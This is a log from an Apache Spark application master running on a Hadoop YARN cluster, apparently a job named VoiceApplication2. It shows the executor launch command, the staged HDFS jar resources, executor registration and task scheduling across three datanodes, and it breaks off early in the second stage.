{{PWD}}<CPS>{{PWD}}/__spark_conf__<CPS>{{PWD}}/__spark_libs__/*<CPS>/usr/hdp/2.6.5.0-292/hadoop/conf<CPS>/usr/hdp/2.6.5.0-292/hadoop/*<CPS>/usr/hdp/2.6.5.0-292/hadoop/lib/*<CPS>/usr/hdp/current/hadoop-hdfs-client/*<CPS>/usr/hdp/current/hadoop-hdfs-client/lib/*<CPS>/usr/hdp/current/hadoop-yarn-client/*<CPS>/usr/hdp/current/hadoop-yarn-client/lib/*<CPS>/usr/hdp/current/ext/hadoop/*<CPS>$PWD/mr-framework/hadoop/share/hadoop/mapreduce/*:$PWD/mr-framework/hadoop/share/hadoop/mapreduce/lib/*:$PWD/mr-framework/hadoop/share/hadoop/common/*:$PWD/mr-framework/hadoop/share/hadoop/common/lib/*:$PWD/mr-framework/hadoop/share/hadoop/yarn/*:$PWD/mr-framework/hadoop/share/hadoop/yarn/lib/*:$PWD/mr-framework/hadoop/share/hadoop/hdfs/*:$PWD/mr-framework/hadoop/share/hadoop/hdfs/lib/*:$PWD/mr-framework/hadoop/share/hadoop/tools/lib/*:/usr/hdp/2.6.5.0-292/hadoop/lib/hadoop-lzo-0.6.0.2.6.5.0-292.jar:/etc/hadoop/conf/secure:/usr/hdp/current/ext/hadoop/*<CPS>{{PWD}}/__spark_conf__/__hadoop_conf__ SPARK_YARN_STAGING_DIR -> *********(redacted) SPARK_USER -> *********(redacted) command: LD_LIBRARY_PATH="/usr/hdp/current/hadoop-client/lib/native:/usr/hdp/current/hadoop-client/lib/native/Linux-amd64-64:$LD_LIBRARY_PATH" \ {{JAVA_HOME}}/bin/java \ -server \ -Xmx5120m \ -Djava.io.tmpdir={{PWD}}/tmp \ '-Dspark.history.ui.port=18081' \ '-Dspark.rpc.message.maxSize=100' \ -Dspark.yarn.app.container.log.dir=<LOG_DIR> \ -XX:OnOutOfMemoryError='kill %p' \ org.apache.spark.executor.CoarseGrainedExecutorBackend \ --driver-url \ spark://CoarseGrainedScheduler@datanode02:20410 \ --executor-id \ <executorId> \ --hostname \ <hostname> \ --cores \ 2 \ --app-id \ application_1565610088533_0087 \ --user-class-path \ file:$PWD/__app__.jar \ --user-class-path \ file:$PWD/hadoop-common-2.7.3.jar \ --user-class-path \ file:$PWD/guava-12.0.1.jar \ --user-class-path \ file:$PWD/hbase-server-1.2.8.jar \ --user-class-path \ file:$PWD/hbase-protocol-1.2.8.jar \ --user-class-path \ file:$PWD/hbase-client-1.2.8.jar \ 
--user-class-path \ file:$PWD/hbase-common-1.2.8.jar \ --user-class-path \ file:$PWD/mysql-connector-java-5.1.44-bin.jar \ --user-class-path \ file:$PWD/spark-streaming-kafka-0-8-assembly_2.11-2.3.2.jar \ --user-class-path \ file:$PWD/spark-examples_2.11-1.6.0-typesafe-001.jar \ --user-class-path \ file:$PWD/fastjson-1.2.7.jar \ 1><LOG_DIR>/stdout \ 2><LOG_DIR>/stderr resources: spark-streaming-kafka-0-8-assembly_2.11-2.3.2.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/spark-streaming-kafka-0-8-assembly_2.11-2.3.2.jar" } size: 12271027 timestamp: 1565697198603 type: FILE visibility: PRIVATE spark-examples_2.11-1.6.0-typesafe-001.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/spark-examples_2.11-1.6.0-typesafe-001.jar" } size: 1867746 timestamp: 1565697198751 type: FILE visibility: PRIVATE hbase-server-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-server-1.2.8.jar" } size: 4197896 timestamp: 1565697197770 type: FILE visibility: PRIVATE hbase-common-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-common-1.2.8.jar" } size: 570163 timestamp: 1565697198318 type: FILE visibility: PRIVATE __app__.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/spark_history_data2.jar" } size: 44924 timestamp: 1565697197260 type: FILE visibility: PRIVATE guava-12.0.1.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/guava-12.0.1.jar" } 
size: 1795932 timestamp: 1565697197614 type: FILE visibility: PRIVATE hbase-client-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-client-1.2.8.jar" } size: 1306401 timestamp: 1565697198180 type: FILE visibility: PRIVATE __spark_conf__ -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/__spark_conf__.zip" } size: 273513 timestamp: 1565697199131 type: ARCHIVE visibility: PRIVATE fastjson-1.2.7.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/fastjson-1.2.7.jar" } size: 417221 timestamp: 1565697198865 type: FILE visibility: PRIVATE hbase-protocol-1.2.8.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hbase-protocol-1.2.8.jar" } size: 4366252 timestamp: 1565697198023 type: FILE visibility: PRIVATE __spark_libs__ -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/hdp/apps/2.6.5.0-292/spark2/spark2-hdp-yarn-archive.tar.gz" } size: 227600110 timestamp: 1549953820247 type: ARCHIVE visibility: PUBLIC mysql-connector-java-5.1.44-bin.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/mysql-connector-java-5.1.44-bin.jar" } size: 999635 timestamp: 1565697198445 type: FILE visibility: PRIVATE hadoop-common-2.7.3.jar -> resource { scheme: "hdfs" host: "CID-042fb939-95b4-4b74-91b8-9f94b999bdf7" port: -1 file: "/user/hdfs/.sparkStaging/application_1565610088533_0087/hadoop-common-2.7.3.jar" } size: 3479293 timestamp: 1565697197476 type: FILE visibility: PRIVATE 
=============================================================================== 19/08/13 19:53:20 INFO RMProxy: Connecting to ResourceManager at namenode02/10.1.38.38:8030 19/08/13 19:53:20 INFO YarnRMClient: Registering the ApplicationMaster 19/08/13 19:53:20 INFO YarnAllocator: Will request 3 executor container(s), each with 2 core(s) and 5632 MB memory (including 512 MB of overhead) 19/08/13 19:53:20 INFO YarnSchedulerBackend$YarnSchedulerEndpoint: ApplicationMaster registered as NettyRpcEndpointRef(spark://YarnAM@datanode02:20410) 19/08/13 19:53:20 INFO YarnAllocator: Submitted 3 unlocalized container requests. 19/08/13 19:53:20 INFO ApplicationMaster: Started progress reporter thread with (heartbeat : 3000, initial allocation : 200) intervals 19/08/13 19:53:20 INFO AMRMClientImpl: Received new token for : datanode03:45454 19/08/13 19:53:21 INFO YarnAllocator: Launching container container_e20_1565610088533_0087_01_000002 on host datanode03 for executor with ID 1 19/08/13 19:53:21 INFO YarnAllocator: Received 1 containers from YARN, launching executors on 1 of them. 19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: yarn.client.max-cached-nodemanagers-proxies : 0 19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: Opening proxy : datanode03:45454 19/08/13 19:53:21 INFO AMRMClientImpl: Received new token for : datanode01:45454 19/08/13 19:53:21 INFO YarnAllocator: Launching container container_e20_1565610088533_0087_01_000003 on host datanode01 for executor with ID 2 19/08/13 19:53:21 INFO YarnAllocator: Received 1 containers from YARN, launching executors on 1 of them. 
19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: yarn.client.max-cached-nodemanagers-proxies : 0 19/08/13 19:53:21 INFO ContainerManagementProtocolProxy: Opening proxy : datanode01:45454 19/08/13 19:53:22 INFO AMRMClientImpl: Received new token for : datanode02:45454 19/08/13 19:53:22 INFO YarnAllocator: Launching container container_e20_1565610088533_0087_01_000004 on host datanode02 for executor with ID 3 19/08/13 19:53:22 INFO YarnAllocator: Received 1 containers from YARN, launching executors on 1 of them. 19/08/13 19:53:22 INFO ContainerManagementProtocolProxy: yarn.client.max-cached-nodemanagers-proxies : 0 19/08/13 19:53:22 INFO ContainerManagementProtocolProxy: Opening proxy : datanode02:45454 19/08/13 19:53:24 INFO YarnSchedulerBackend$YarnDriverEndpoint: Registered executor NettyRpcEndpointRef(spark-client://Executor) (10.1.198.144:41122) with ID 1 19/08/13 19:53:25 INFO YarnSchedulerBackend$YarnDriverEndpoint: Registered executor NettyRpcEndpointRef(spark-client://Executor) (10.1.229.163:24656) with ID 3 19/08/13 19:53:25 INFO BlockManagerMasterEndpoint: Registering block manager datanode03:3328 with 2.5 GB RAM, BlockManagerId(1, datanode03, 3328, None) 19/08/13 19:53:25 INFO BlockManagerMasterEndpoint: Registering block manager datanode02:28863 with 2.5 GB RAM, BlockManagerId(3, datanode02, 28863, None) 19/08/13 19:53:25 INFO YarnSchedulerBackend$YarnDriverEndpoint: Registered executor NettyRpcEndpointRef(spark-client://Executor) (10.1.229.158:64276) with ID 2 19/08/13 19:53:25 INFO YarnClusterSchedulerBackend: SchedulerBackend is ready for scheduling beginning after reached minRegisteredResourcesRatio: 0.8 19/08/13 19:53:25 INFO YarnClusterScheduler: YarnClusterScheduler.postStartHook done 19/08/13 19:53:25 INFO BlockManagerMasterEndpoint: Registering block manager datanode01:20487 with 2.5 GB RAM, BlockManagerId(2, datanode01, 20487, None) 19/08/13 19:53:25 WARN SparkContext: Using an existing SparkContext; some configuration may not take 
effect. 19/08/13 19:53:25 INFO SparkContext: Starting job: start at VoiceApplication2.java:128 19/08/13 19:53:25 INFO DAGScheduler: Registering RDD 1 (start at VoiceApplication2.java:128) 19/08/13 19:53:25 INFO DAGScheduler: Got job 0 (start at VoiceApplication2.java:128) with 20 output partitions 19/08/13 19:53:25 INFO DAGScheduler: Final stage: ResultStage 1 (start at VoiceApplication2.java:128) 19/08/13 19:53:25 INFO DAGScheduler: Parents of final stage: List(ShuffleMapStage 0) 19/08/13 19:53:25 INFO DAGScheduler: Missing parents: List(ShuffleMapStage 0) 19/08/13 19:53:26 INFO DAGScheduler: Submitting ShuffleMapStage 0 (MapPartitionsRDD[1] at start at VoiceApplication2.java:128), which has no missing parents 19/08/13 19:53:26 INFO MemoryStore: Block broadcast_0 stored as values in memory (estimated size 3.1 KB, free 366.3 MB) 19/08/13 19:53:26 INFO MemoryStore: Block broadcast_0_piece0 stored as bytes in memory (estimated size 2011.0 B, free 366.3 MB) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode02:31984 (size: 2011.0 B, free: 366.3 MB) 19/08/13 19:53:26 INFO SparkContext: Created broadcast 0 from broadcast at DAGScheduler.scala:1039 19/08/13 19:53:26 INFO DAGScheduler: Submitting 50 missing tasks from ShuffleMapStage 0 (MapPartitionsRDD[1] at start at VoiceApplication2.java:128) (first 15 tasks are for partitions Vector(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14)) 19/08/13 19:53:26 INFO YarnClusterScheduler: Adding task set 0.0 with 50 tasks 19/08/13 19:53:26 INFO TaskSetManager: Starting task 0.0 in stage 0.0 (TID 0, datanode02, executor 3, partition 0, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 1.0 in stage 0.0 (TID 1, datanode03, executor 1, partition 1, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 2.0 in stage 0.0 (TID 2, datanode01, executor 2, partition 2, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 
3.0 in stage 0.0 (TID 3, datanode02, executor 3, partition 3, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 4.0 in stage 0.0 (TID 4, datanode03, executor 1, partition 4, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 5.0 in stage 0.0 (TID 5, datanode01, executor 2, partition 5, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode02:28863 (size: 2011.0 B, free: 2.5 GB) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode03:3328 (size: 2011.0 B, free: 2.5 GB) 19/08/13 19:53:26 INFO BlockManagerInfo: Added broadcast_0_piece0 in memory on datanode01:20487 (size: 2011.0 B, free: 2.5 GB) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 6.0 in stage 0.0 (TID 6, datanode02, executor 3, partition 6, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 7.0 in stage 0.0 (TID 7, datanode02, executor 3, partition 7, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 3.0 in stage 0.0 (TID 3) in 693 ms on datanode02 (executor 3) (1/50) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 0.0 in stage 0.0 (TID 0) in 712 ms on datanode02 (executor 3) (2/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 8.0 in stage 0.0 (TID 8, datanode02, executor 3, partition 8, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 7.0 in stage 0.0 (TID 7) in 21 ms on datanode02 (executor 3) (3/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 9.0 in stage 0.0 (TID 9, datanode02, executor 3, partition 9, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 6.0 in stage 0.0 (TID 6) in 26 ms on datanode02 (executor 3) (4/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 10.0 in stage 0.0 (TID 10, datanode02, executor 3, partition 10, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished 
task 8.0 in stage 0.0 (TID 8) in 23 ms on datanode02 (executor 3) (5/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 11.0 in stage 0.0 (TID 11, datanode02, executor 3, partition 11, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 9.0 in stage 0.0 (TID 9) in 25 ms on datanode02 (executor 3) (6/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 12.0 in stage 0.0 (TID 12, datanode02, executor 3, partition 12, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 10.0 in stage 0.0 (TID 10) in 18 ms on datanode02 (executor 3) (7/50) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 11.0 in stage 0.0 (TID 11) in 14 ms on datanode02 (executor 3) (8/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 13.0 in stage 0.0 (TID 13, datanode02, executor 3, partition 13, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 14.0 in stage 0.0 (TID 14, datanode02, executor 3, partition 14, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 12.0 in stage 0.0 (TID 12) in 16 ms on datanode02 (executor 3) (9/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 15.0 in stage 0.0 (TID 15, datanode02, executor 3, partition 15, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 13.0 in stage 0.0 (TID 13) in 22 ms on datanode02 (executor 3) (10/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 16.0 in stage 0.0 (TID 16, datanode02, executor 3, partition 16, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 14.0 in stage 0.0 (TID 14) in 16 ms on datanode02 (executor 3) (11/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 17.0 in stage 0.0 (TID 17, datanode02, executor 3, partition 17, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 15.0 in stage 0.0 (TID 15) in 13 ms on datanode02 (executor 3) (12/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting 
task 18.0 in stage 0.0 (TID 18, datanode01, executor 2, partition 18, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 19.0 in stage 0.0 (TID 19, datanode01, executor 2, partition 19, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 5.0 in stage 0.0 (TID 5) in 787 ms on datanode01 (executor 2) (13/50) 19/08/13 19:53:26 INFO TaskSetManager: Finished task 2.0 in stage 0.0 (TID 2) in 789 ms on datanode01 (executor 2) (14/50) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 20.0 in stage 0.0 (TID 20, datanode03, executor 1, partition 20, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:26 INFO TaskSetManager: Starting task 21.0 in stage 0.0 (TID 21, datanode03, executor 1, partition 21, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 4.0 in stage 0.0 (TID 4) in 905 ms on datanode03 (executor 1) (15/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 1.0 in stage 0.0 (TID 1) in 907 ms on datanode03 (executor 1) (16/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 22.0 in stage 0.0 (TID 22, datanode02, executor 3, partition 22, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 23.0 in stage 0.0 (TID 23, datanode02, executor 3, partition 23, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 24.0 in stage 0.0 (TID 24, datanode01, executor 2, partition 24, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 18.0 in stage 0.0 (TID 18) in 124 ms on datanode01 (executor 2) (17/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 16.0 in stage 0.0 (TID 16) in 134 ms on datanode02 (executor 3) (18/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 25.0 in stage 0.0 (TID 25, datanode01, executor 2, partition 25, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 26.0 in stage 0.0 (TID 26, datanode03, executor 1, partition 26, PROCESS_LOCAL, 7831 bytes) 
19/08/13 19:53:27 INFO TaskSetManager: Finished task 17.0 in stage 0.0 (TID 17) in 134 ms on datanode02 (executor 3) (19/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 20.0 in stage 0.0 (TID 20) in 122 ms on datanode03 (executor 1) (20/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 27.0 in stage 0.0 (TID 27, datanode03, executor 1, partition 27, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 19.0 in stage 0.0 (TID 19) in 127 ms on datanode01 (executor 2) (21/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 21.0 in stage 0.0 (TID 21) in 123 ms on datanode03 (executor 1) (22/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 28.0 in stage 0.0 (TID 28, datanode02, executor 3, partition 28, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 29.0 in stage 0.0 (TID 29, datanode02, executor 3, partition 29, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 22.0 in stage 0.0 (TID 22) in 19 ms on datanode02 (executor 3) (23/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 23.0 in stage 0.0 (TID 23) in 18 ms on datanode02 (executor 3) (24/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 30.0 in stage 0.0 (TID 30, datanode01, executor 2, partition 30, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 31.0 in stage 0.0 (TID 31, datanode01, executor 2, partition 31, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 25.0 in stage 0.0 (TID 25) in 27 ms on datanode01 (executor 2) (25/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 24.0 in stage 0.0 (TID 24) in 29 ms on datanode01 (executor 2) (26/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 32.0 in stage 0.0 (TID 32, datanode02, executor 3, partition 32, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 29.0 in stage 0.0 (TID 29) in 16 ms on datanode02 (executor 3) (27/50) 19/08/13 
19:53:27 INFO TaskSetManager: Starting task 33.0 in stage 0.0 (TID 33, datanode03, executor 1, partition 33, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 26.0 in stage 0.0 (TID 26) in 30 ms on datanode03 (executor 1) (28/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 34.0 in stage 0.0 (TID 34, datanode02, executor 3, partition 34, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 28.0 in stage 0.0 (TID 28) in 21 ms on datanode02 (executor 3) (29/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 35.0 in stage 0.0 (TID 35, datanode03, executor 1, partition 35, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 27.0 in stage 0.0 (TID 27) in 32 ms on datanode03 (executor 1) (30/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 36.0 in stage 0.0 (TID 36, datanode02, executor 3, partition 36, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 32.0 in stage 0.0 (TID 32) in 11 ms on datanode02 (executor 3) (31/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 37.0 in stage 0.0 (TID 37, datanode01, executor 2, partition 37, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 30.0 in stage 0.0 (TID 30) in 18 ms on datanode01 (executor 2) (32/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 38.0 in stage 0.0 (TID 38, datanode01, executor 2, partition 38, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 31.0 in stage 0.0 (TID 31) in 20 ms on datanode01 (executor 2) (33/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 39.0 in stage 0.0 (TID 39, datanode03, executor 1, partition 39, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 33.0 in stage 0.0 (TID 33) in 17 ms on datanode03 (executor 1) (34/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 34.0 in stage 0.0 (TID 34) in 17 ms on datanode02 (executor 3) (35/50) 
19/08/13 19:53:27 INFO TaskSetManager: Starting task 40.0 in stage 0.0 (TID 40, datanode02, executor 3, partition 40, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 41.0 in stage 0.0 (TID 41, datanode03, executor 1, partition 41, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 35.0 in stage 0.0 (TID 35) in 17 ms on datanode03 (executor 1) (36/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 42.0 in stage 0.0 (TID 42, datanode02, executor 3, partition 42, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 36.0 in stage 0.0 (TID 36) in 16 ms on datanode02 (executor 3) (37/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 43.0 in stage 0.0 (TID 43, datanode01, executor 2, partition 43, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 37.0 in stage 0.0 (TID 37) in 16 ms on datanode01 (executor 2) (38/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 44.0 in stage 0.0 (TID 44, datanode02, executor 3, partition 44, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 45.0 in stage 0.0 (TID 45, datanode02, executor 3, partition 45, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 40.0 in stage 0.0 (TID 40) in 14 ms on datanode02 (executor 3) (39/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 42.0 in stage 0.0 (TID 42) in 11 ms on datanode02 (executor 3) (40/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 46.0 in stage 0.0 (TID 46, datanode03, executor 1, partition 46, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 39.0 in stage 0.0 (TID 39) in 20 ms on datanode03 (executor 1) (41/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 47.0 in stage 0.0 (TID 47, datanode03, executor 1, partition 47, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 41.0 in stage 0.0 (TID 41) in 20 ms on 
datanode03 (executor 1) (42/50) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 48.0 in stage 0.0 (TID 48, datanode01, executor 2, partition 48, PROCESS_LOCAL, 7831 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Starting task 49.0 in stage 0.0 (TID 49, datanode01, executor 2, partition 49, PROCESS_LOCAL, 7888 bytes) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 43.0 in stage 0.0 (TID 43) in 18 ms on datanode01 (executor 2) (43/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 38.0 in stage 0.0 (TID 38) in 31 ms on datanode01 (executor 2) (44/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 45.0 in stage 0.0 (TID 45) in 11 ms on datanode02 (executor 3) (45/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 44.0 in stage 0.0 (TID 44) in 16 ms on datanode02 (executor 3) (46/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 46.0 in stage 0.0 (TID 46) in 18 ms on datanode03 (executor 1) (47/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 48.0 in stage 0.0 (TID 48) in 15 ms on datanode01 (executor 2) (48/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 47.0 in stage 0.0 (TID 47) in 15 ms on datanode03 (executor 1) (49/50) 19/08/13 19:53:27 INFO TaskSetManager: Finished task 49.0 in stage 0.0 (TID 49) in 25 ms on datanode01 (executor 2) (50/50) 19/08/13 19:53:27 INFO YarnClusterScheduler: Removed TaskSet 0.0, whose tasks have all completed, from pool 19/08/13 19:53:27 INFO DAGScheduler: ShuffleMapStage 0 (start at VoiceApplication2.java:128) finished in 1.174 s 19/08/13 19:53:27 INFO DAGScheduler: looking for newly runnable stages 19/08/13 19:53:27 INFO DAGScheduler: running: Set() 19/08/13 19:53:27 INFO DAGScheduler: waiting: Set(ResultStage 1) 19/08/13 19:53:27 INFO DAGScheduler: failed: Set() 19/08/13 19:53:27 INFO DAGScheduler: Submitting ResultStage 1 (ShuffledRDD[2] at start at VoiceApplication2.java:128), which has no missing parents 19/08/13 19:53:27 INFO MemoryStore: Block broadcast_1 stored as values in 
memory (estimated size 3.2 KB, free 366.3 MB)
19/08/13 19:53:27 INFO MemoryStore: Block broadcast_1_piece0 stored as bytes in memory (estimated size 1979.0 B, free 366.3 MB)
19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode02:31984 (size: 1979.0 B, free: 366.3 MB)
19/08/13 19:53:27 INFO SparkContext: Created broadcast 1 from broadcast at DAGScheduler.scala:1039
19/08/13 19:53:27 INFO DAGScheduler: Submitting 20 missing tasks from ResultStage 1 (ShuffledRDD[2] at start at VoiceApplication2.java:128) (first 15 tasks are for partitions Vector(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))
19/08/13 19:53:27 INFO YarnClusterScheduler: Adding task set 1.0 with 20 tasks
19/08/13 19:53:27 INFO TaskSetManager: Starting task 0.0 in stage 1.0 (TID 50, datanode03, executor 1, partition 0, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 1.0 in stage 1.0 (TID 51, datanode02, executor 3, partition 1, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 3.0 in stage 1.0 (TID 52, datanode01, executor 2, partition 3, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 2.0 in stage 1.0 (TID 53, datanode03, executor 1, partition 2, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 4.0 in stage 1.0 (TID 54, datanode02, executor 3, partition 4, NODE_LOCAL, 7638 bytes)
